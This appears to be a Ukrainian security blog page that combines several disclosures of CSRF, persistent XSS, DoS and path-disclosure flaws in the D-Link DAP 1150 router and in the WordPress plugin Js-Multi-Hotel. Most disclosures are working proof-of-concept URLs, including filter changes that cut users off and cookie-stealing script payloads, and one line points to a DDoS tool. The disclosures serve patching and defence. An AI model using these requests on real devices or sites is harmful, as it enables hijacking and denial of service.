Добірка уразливостей
17:21 16.04.2014В даній добірці уразливості в веб додатках:
В даній добірці уразливості в веб додатках:
Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.
Цього разу повідомляю про уразливості в плагінах Orange, Page Flip Image Gallery та DZS Video Gallery. Для котрих з’явилися експлоіти. Orange - це тема движка, Page Flip Image Gallery - це плагін для створення галереї зображень, DZS Video Gallery - це плагін для створення відео галереї.
Стосовно DZS Video Gallery, то це не RFD, а Content Spoofing.
Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.
Продовжуючи тему уразливостей в D-Link DAP 1150. Раніше я розповідав про два режими роботи цього пристрою і зараз представляю нові уразливості в режимі роутера. У листопаді, 17.11.2011, я виявив численні Cross-Site Request Forgery та Cross-Site Scripting уразливості в D-Link DAP 1150 (Wi-Fi Access Point and Router).
Уразлива версія D-Link DAP 1150, Firmware version 1.2.94. Дана модель з іншими прошивками також повинна бути вразливою. Компанія D-Link тоді проігнорувала усі уразливості в цьому пристрої й досі їх не виправила.
CSRF (WASC-09):
В розділі Firewall / MAC-filter через CSRF можна додавати, редагувати та видаляти налаштування MAC-фільтрів.
Додати:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=74&res_struct_size=0&res_buf={%22mac%22:%221%22,%22enable%22:%22ACCEPT%22}&res_pos=-1
Редагувати:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=74&res_struct_size=0&res_buf={%22mac%22:%221%22,%22enable%22:%22ACCEPT%22}&res_pos=0
Видалити:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=2&res_config_id=74&res_struct_size=0&res_pos=0
DoS атака через CSRF:
Додавши відповідні MAC-фільтри, можна заблокувати користувачам доступ в Інтернет через даний роутер. Для цього в полі mac треба вказати MAC-адресу пристрою, а в полі enable - DROP.
XSS (WASC-08):
Це persistent XSS. Код виконається в розділі Firewall / MAC-filter.
Атака через функцію додавання в параметрі res_buf:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=74&res_struct_size=0&res_buf={%22mac%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%22enable%22:%22ACCEPT%22}&res_pos=-1
Атака через функцію редагування в параметрі res_buf:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=74&res_struct_size=0&res_buf={%22mac%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%22enable%22:%22ACCEPT%22}&res_pos=0
CSRF (WASC-09):
В розділі Firewall / Virtual servers через CSRF можна додавати, редагувати та видаляти віртуальні сервери.
XSS (WASC-08):
Це persistent XSS. Код виконається в розділі Firewall / Virtual servers. Атака відбувається через функції додавання та редагування в параметрі res_buf.
В даній добірці уразливості в веб додатках:
В 2011 році - початку 2012 року я оприлюднив численні уразливості в D-Link DAP 1150 (декілька десятків). Тоді я оприлюднив уразливості в адмінці в режими точки доступу, а зараз розповім про дірки в режимі роутера.
Раніше я розповідав про два режими роботи цього пристрою і зараз представляю нові уразливості. У листопаді, 17.11.2011, я виявив численні Cross-Site Request Forgery та Cross-Site Scripting уразливості в D-Link DAP 1150 (Wi-Fi Access Point and Router).
Уразлива версія D-Link DAP 1150, Firmware version 1.2.94. Дана модель з іншими прошивками також повинна бути вразливою. Компанія D-Link тоді проігнорувала усі уразливості в цьому пристрої й досі їх не виправила.
CSRF (WASC-09):
В розділі Firewall в підрозділі IP-filters через CSRF можна додавати, редагувати та видаляти налаштування IP-фільтрів.
Додати:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_config_action=3&res_json=y&res_data_type=json&res_struct_size=0&res_config_id=88&res_buf={%22name%22:%22IP%22,%20%22ports%22:%2280%22,%20%22portd%22:%2280%22,%20%22proto%22:0,%20%22action%22:0,%20%22ips%22:%22192.168.1.1/32%22,%20%22ipd%22:%22192.168.1.2/32%22}&res_pos=-1
Редагувати:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_config_action=3&res_json=y&res_data_type=json&res_struct_size=0&res_config_id=88&res_buf={%22name%22:%22IP%22,%20%22ports%22:%2280%22,%20%22portd%22:%2280%22,%20%22proto%22:0,%20%22action%22:0,%20%22ips%22:%22192.168.1.1/32%22,%20%22ipd%22:%22192.168.1.2/32%22}&res_pos=0
Видалити:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=2&res_struct_size=0&res_config_id=88&res_pos=0
XSS (WASC-08):
Це persistent XSS. Код виконається в розділі Firewall / IP-filters.
Атака через функцію додавання в параметрі res_buf (в полях: Name, IP Addresses Source, Destination, Ports Source, Destination).
http://192.168.0.50/index.cgi?v2=y&rq=y&res_config_action=3&res_json=y&res_data_type=json&res_struct_size=0&res_config_id=88&res_buf={%22name%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22ports%22:%2280%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22portd%22:%2280%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22proto%22:0,%20%22action%22:0,%20%22ips%22:%22192.168.1.1/32%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22ipd%22:%22192.168.1.2/32%3Cscript%3Ealert(document.cookie)%3C/script%3E%22}&res_pos=-1
Атака через функцію редагування в параметрі res_buf (в полі Name, але не в інших полях).
http://192.168.0.50/index.cgi?v2=y&rq=y&res_config_action=3&res_json=y&res_data_type=json&res_struct_size=0&res_config_id=88&res_buf={%22name%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22ports%22:%2280%22,%20%22portd%22:%2280%22,%20%22proto%22:0,%20%22action%22:0,%20%22ips%22:%22192.168.1.1/32%22,%20%22ipd%22:%22192.168.1.2/32%22}&res_pos=0
Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.
Цього разу повідомляю про уразливості в плагінах Blogfolio, Folo та Easy Career Openings. Для котрих з’явилися експлоіти. Blogfolio - це тема движка, Folo - це тема движка, Easy Career Openings - це плагін для створення списку вакансій.
Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.
У березні, 21.03.2014, я виявив Abuse of Functionality, Denial of Service, Cross-Site Scripting та Full path disclosure уразливості в плагіні Js-Multi-Hotel для WordPress. Про що найближчим часом повідомлю розробникам. Це друга частина уразливостей в цьому плагіні, а з часом я оприлюдню інші дірки.
Раніше я писав про XSS і FPD уразливості в Js-Multi-Hotel для WordPress. Стосовно плагінів для WordPress перед цим я писав про уразливості в VideoWhisper Live Streaming Integration для WP.
Abuse of Functionality (WASC-42):
http://site/wp-content/plugins/js-multihotel/includes/show_image.php?file=http://site&w=1&h=1
DoS (WASC-10):
http://site/wp-content/plugins/js-multihotel/includes/show_image.php?file=http://site/big_file&h=1&w=1
Окрім проведення DoS атак вручну, також можна проводити автоматизовані DoS і DDoS атаки з використанням DAVOSET.
Cross-Site Scripting (WASC-08):
http://site/wp-content/plugins/js-multihotel/includes/delete_img.php?path=%3Cbody%20onload=with(document)alert(cookie)%3E
Про XSS уразливість в refreshDate.php в параметрі roomid я вже писав раніше.
Full path disclosure (WASC-13):
http://site/wp-content/plugins/js-multihotel/includes/functions.php
http://site/wp-content/plugins/js-multihotel/includes/myCalendar.php
http://site/wp-content/plugins/js-multihotel/includes/refreshDate.php?d=
http://site/wp-content/plugins/js-multihotel/includes/show_image.php
http://site/wp-content/plugins/js-multihotel/includes/widget.php
http://site/wp-content/plugins/js-multihotel/includes/phpthumb/GdThumb.inc.php
http://site/wp-content/plugins/js-multihotel/includes/phpthumb/thumb_plugins/gd_reflection.inc.php
Уразливі Js-Multi-Hotel 2.2.1 та попередні версії.
В даній добірці уразливості в веб додатках:
У березні, 21.03.2014, я виявив Cross-Site Scripting та Full path disclosure уразливості в плагіні Js-Multi-Hotel для WordPress. Про що найближчим часом повідомлю розробникам.
Стосовно плагінів для WordPress раніше я писав про уразливості в VideoWhisper Live Streaming Integration для WordPress.
Я знайшов численні уразливості в цьому плагіні. Ось XSS та FPD уразливості, а з часом оприлюдню інші дірки.
Cross-Site Scripting (WASC-08):
http://site/wp-content/plugins/js-multihotel/includes/timthumb.php?src=%3C%3Cbody%20onload=alert(document.cookie)%3E
Full path disclosure (WASC-13):
http://site/wp-content/plugins/js-multihotel/includes/timthumb.php?src=http://
Уразливі Js-Multi-Hotel 2.2.1 та попередні версії.
Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.
Цього разу повідомляю про уразливості в плагінах Pinboard, Blogggie та Jigoshop. Для котрих з’явилися експлоіти. Pinboard - це тема движка, Blogggie - це тема движка, Jigoshop - це e-commerce плагін для створення онлайн-магазину.
Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.